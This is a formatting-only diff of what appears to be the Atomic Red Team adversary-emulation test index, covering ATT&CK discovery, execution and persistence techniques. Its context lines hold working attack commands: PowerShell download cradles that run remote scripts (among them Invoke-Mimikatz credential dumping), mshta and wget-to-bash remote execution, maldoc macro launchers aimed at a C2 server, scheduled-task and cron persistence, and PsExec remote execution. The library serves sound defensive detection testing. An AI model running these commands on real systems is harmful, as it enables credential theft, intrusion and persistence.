@@ -56850,7 +56850,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info - ' +' supported_platforms: - macos executor:
@@ -56862,7 +56862,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info - ' +' supported_platforms: - linux - macos
@@ -56879,14 +56879,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null - ' +' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor:
@@ -56905,7 +56905,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. - ' +' supported_platforms: - linux executor:
@@ -56921,40 +56921,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. - ' +' supported_platforms: - windows executor: command: 'hostname - ' +' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. - ' +' supported_platforms: - linux - macos executor: command: 'hostname - ' +' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. - ' +' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid - ' +' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370
@@ -56979,27 +56979,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - windows executor: command: 'set - ' +' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. - ' +' supported_platforms: - macos - linux executor: command: 'env - ' +' name: sh T1614: technique:
@@ -57146,7 +57146,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all - ' +' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17
@@ -57161,11 +57161,11 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" executor:
@@ -57217,10 +57217,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist - ' +' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}"
@@ -57239,7 +57239,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" - ' +' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee
@@ -57257,14 +57257,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) - ' +' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} - ' +' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt
@@ -57393,7 +57393,7 @@ discovery: executor: command: 'Get-NetTCPConnection - ' +' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2
@@ -57408,14 +57408,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; - ' +' executor: command: | netstat
@@ -57449,10 +57449,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) - ' +' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}"
@@ -57631,10 +57631,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' name: command_prompt T1124: technique:
@@ -57701,7 +57701,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. - ' +' supported_platforms: - windows input_arguments:
@@ -57719,13 +57719,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. - ' +' supported_platforms: - windows executor: command: 'Get-Date - ' +' name: powershell - name: System Time Discovery in macOS auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f
@@ -57736,7 +57736,7 @@ discovery: executor: command: 'date - ' +' name: sh T1497.003: technique:
@@ -59368,11 +59368,11 @@ resource-development: dependencies: - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable} - ' +' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force
@@ -59383,7 +59383,7 @@ resource-development: cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore - ' +' name: powershell elevation_required: true T1608.001:
@@ -61370,7 +61370,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\\\" | python &\"" - ' +' name: sh T1053.001: technique:
@@ -61427,7 +61427,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments:
@@ -61443,30 +61443,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references:
@@ -61563,7 +61563,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1059: technique: created: '2017-05-31T21:30:49.546Z'
@@ -61860,7 +61860,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. - ' +' supported_platforms: - containers input_arguments:
@@ -61875,20 +61875,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} - ' +' name: bash elevation_required: false T1053.007:
@@ -61957,7 +61957,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments:
@@ -61968,17 +61968,17 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl get cronjobs -n #{namespace} - ' +' name: bash elevation_required: false - name: CreateCronjob
@@ -61990,7 +61990,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. - ' +' supported_platforms: - containers input_arguments:
@@ -62001,20 +62001,20 @@ execution: dependencies: - description: 'kubectl must be installed - ' +' get_prereq_command: 'echo "kubectl must be installed manually" - ' +' prereq_command: 'which kubectl - ' +' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} - ' +' cleanup_command: 'kubectl delete cronjob art -n #{namespace} - ' +' name: bash elevation_required: false T1053.003:
@@ -62073,7 +62073,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. - ' +' supported_platforms: - macos - linux
@@ -62093,7 +62093,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil - ' +' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily,
@@ -62101,7 +62101,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - macos - linux
@@ -62133,7 +62133,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. - ' +' supported_platforms: - linux input_arguments:
@@ -62150,10 +62150,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} - ' +' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} - ' +' T1610: technique: external_references:
@@ -62300,7 +62300,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word - ' +' supported_platforms: - windows executor:
@@ -62323,13 +62323,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script - ' +' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx - ' +' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181
@@ -62643,7 +62643,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl - ' +' supported_platforms: - macos input_arguments:
@@ -62658,10 +62658,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} - ' +' cleanup_command: 'launchctl remove #{label_name} - ' +' name: bash T1053.004: technique:
@@ -62802,7 +62802,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file - ' +' type: String default: C:\Users\Public\art.jse ms_product:
@@ -62813,7 +62813,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -62824,7 +62824,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -62833,13 +62833,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore - ' +' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file - ' +' supported_platforms: - windows input_arguments:
@@ -62857,7 +62857,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18
@@ -62875,7 +62875,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -62886,7 +62886,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -62914,7 +62914,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -62925,7 +62925,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -62952,7 +62952,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -62963,7 +62963,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -62995,7 +62995,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed - ' +' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null
@@ -63005,7 +63005,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" - ' +' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
@@ -63077,7 +63077,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application"
@@ -63086,10 +63086,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" - ' +' - description: 'Google Chrome must be installed - ' +' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName
@@ -63098,7 +63098,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
@@ -63107,7 +63107,7 @@ execution: name: powershell cleanup_command: 'Stop-Process -name mshta - ' +' - name: Potentially Unwanted Applications (PUA) auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: 'The Potentially Unwanted Applications (PUA) protection feature
@@ -63119,7 +63119,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). - ' +' supported_platforms: - windows input_arguments:
@@ -63154,16 +63154,16 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro - ' +' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. - ' +' type: Url - default: + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server.
@@ -63180,7 +63180,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel - ' +' type: String default: Word dependency_executor_name: powershell
@@ -63188,17 +63188,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. - ' +' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) - ' +' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" - ' +' - description: 'Microsoftt #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null
@@ -63209,7 +63209,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: name: powershell command: |
@@ -63222,7 +63222,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore - ' +' T1204.003: technique: external_references:
@@ -63564,7 +63564,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. - ' +' supported_platforms: - windows input_arguments:
@@ -63576,7 +63576,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" - ' +' name: command_prompt elevation_required: true - name: Run BloodHound from local disk
@@ -63596,15 +63596,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" - ' +' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan
@@ -63613,7 +63613,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force - ' +' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7
@@ -63631,7 +63631,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force - ' +' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804
@@ -63639,7 +63639,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - ' +' supported_platforms: - windows executor:
@@ -63654,7 +63654,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. - ' +' supported_platforms: - windows executor:
@@ -63685,7 +63685,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" - ' +' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da
@@ -63705,7 +63705,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" - ' +' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6
@@ -63725,7 +63725,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" - ' +' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af
@@ -63743,7 +63743,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" - ' +' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7
@@ -63785,26 +63785,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed - ' +' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually - ' +' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion - ' +' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. - ' +' supported_platforms: - windows input_arguments:
@@ -63815,14 +63815,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive - ' +' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} - ' +' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically - ' +' executor: name: powershell command: |
@@ -63831,7 +63831,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore - ' +' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: |
@@ -63848,12 +63848,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled - ' +' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting - ' +' executor: name: powershell elevation_required: true
@@ -63887,7 +63887,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction
@@ -63923,7 +63923,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation
@@ -63954,7 +63954,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute
@@ -63990,7 +63990,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force - ' +' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments
@@ -64003,7 +64003,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. - ' +' supported_platforms: - windows input_arguments:
@@ -64014,7 +64014,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} - ' +' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3
@@ -64036,7 +64036,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" - ' +' executor: name: powershell elevation_required: true
@@ -64050,7 +64050,7 @@ execution: auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia - ' +' supported_platforms: - windows executor:
@@ -64135,7 +64135,7 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests - ' +' executor: command: | which_python=$(which python || which python3 || which python2)
@@ -64175,7 +64175,7 @@ execution: dependencies: - description: 'Requires Python - ' +' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $?
@@ -64202,7 +64202,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments - ' +' supported_platforms: - linux input_arguments:
@@ -64236,7 +64236,7 @@ execution: dependencies: - description: 'Requires Python - ' +' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $?
@@ -64259,7 +64259,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} - ' +' T1053.005: technique: created: '2019-11-27T14:58:00.429Z'
@@ -64357,7 +64357,7 @@ execution: description: 'Upon successful execution, cmd.exe will create a scheduled task to spawn cmd.exe at 20:10. - ' +' supported_platforms: - windows input_arguments: @@ -64374,10 +64374,10 @@ execution: elevation_required: false command: 'SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /TN spawn /F >nul 2>&1 - ' +' - name: Scheduled task Remote auto_generated_guid: 2e5eac3e-327b-4a88-a0c0-c4057039a8dd description: | @@ -64413,11 +64413,11 @@ execution: command: 'SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} - ' +' cleanup_command: 'SCHTASKS /Delete /S #{target} /U #{user_name} /P #{password} /TN "Atomic task" /F >nul 2>&1 - ' +' - name: Powershell Cmdlet Scheduled Task auto_generated_guid: af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd description: | @@ -64439,7 +64439,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "AtomicTask" -confirm:$false >$null 2>&1 - ' +' - name: Task Scheduler via VBA auto_generated_guid: ecd3fa21-7792-41a2-8726-2c5c673414d3 description: | @@ -64456,7 +64456,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -64467,7 +64467,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" @@ -64480,7 +64480,7 @@ execution: login from XML by leveraging WMI class PS_ScheduledTask. Does the same thing as Register-ScheduledTask cmdlet behind the scenes. - ' +' supported_platforms: - windows executor: 
@@ -64492,7 +64492,7 @@ execution: cleanup_command: 'Unregister-ScheduledTask -TaskName "T1053_005_WMI" -confirm:$false >$null 2>&1 - ' +' T1053: technique: id: attack-pattern--35dd844a-b219-4e2b-a6bb-efa9a75995a9 @@ -64706,7 +64706,7 @@ execution: sc.exe delete #{service_name} cleanup_command: 'del C:\art-marker.txt >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: Use PsExec to execute a command on a remote host @@ -64740,10 +64740,10 @@ execution: - description: 'PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - ' +' prereq_command: 'if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - ' +' get_prereq_command: | Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force @@ -64753,7 +64753,7 @@ execution: command: '#{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" - ' +' name: command_prompt T1129: technique: @@ -64886,7 +64886,7 @@ execution: description: 'An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. - ' +' supported_platforms: - windows input_arguments: @@ -64902,10 +64902,10 @@ execution: - description: 'Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - ' +' prereq_command: 'if not exist "#{radmin_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading radmin installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi" #{radmin_installer} 
@@ -65128,20 +65128,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: false command: 'systemd-run --user --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl --user stop Atomic-Red-Team.service systemctl --user stop Atomic-Red-Team.timer @@ -65158,20 +65158,20 @@ execution: dependencies: - description: 'Check if systemd-run exists on the machine - ' +' prereq_command: 'if [ -x "$(command -v systemd-run)" ]; then exit 0; else exit 1; fi; - ' +' get_prereq_command: 'echo "Install systemd on the machine."; exit 1; - ' +' executor: elevation_required: true command: 'systemd-run --unit=Atomic-Red-Team --on-calendar ''*:0/1'' /bin/sh -c ''echo "$(date) $(whoami)" >>/tmp/log'' - ' +' cleanup_command: | systemctl stop Atomic-Red-Team.service systemctl stop Atomic-Red-Team.timer @@ -65238,7 +65238,7 @@ execution: auto_generated_guid: 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873 description: 'Creates and executes a simple bash script. - ' +' supported_platforms: - macos - linux @@ -65255,7 +65255,7 @@ execution: sh #{script_path} cleanup_command: 'rm #{script_path} - ' +' name: sh - name: Command-Line Interface auto_generated_guid: d0c88567-803d-4dca-99b4-7ce65e7b257c @@ -65272,7 +65272,7 @@ execution: wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash cleanup_command: 'rm /tmp/art-fish.txt - ' +' name: sh T1204: technique: @@ -65429,7 +65429,7 @@ execution: dependencies: - description: 'The 64-bit version of Microsoft Office must be installed - ' +' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" 
@@ -65440,7 +65440,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -65449,7 +65449,7 @@ execution: cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null - ' +' name: powershell - name: Extract Memory via VBA auto_generated_guid: 8faff437-a114-4547-9a60-749652a03df6 @@ -65468,7 +65468,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -65479,7 +65479,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX (iwr 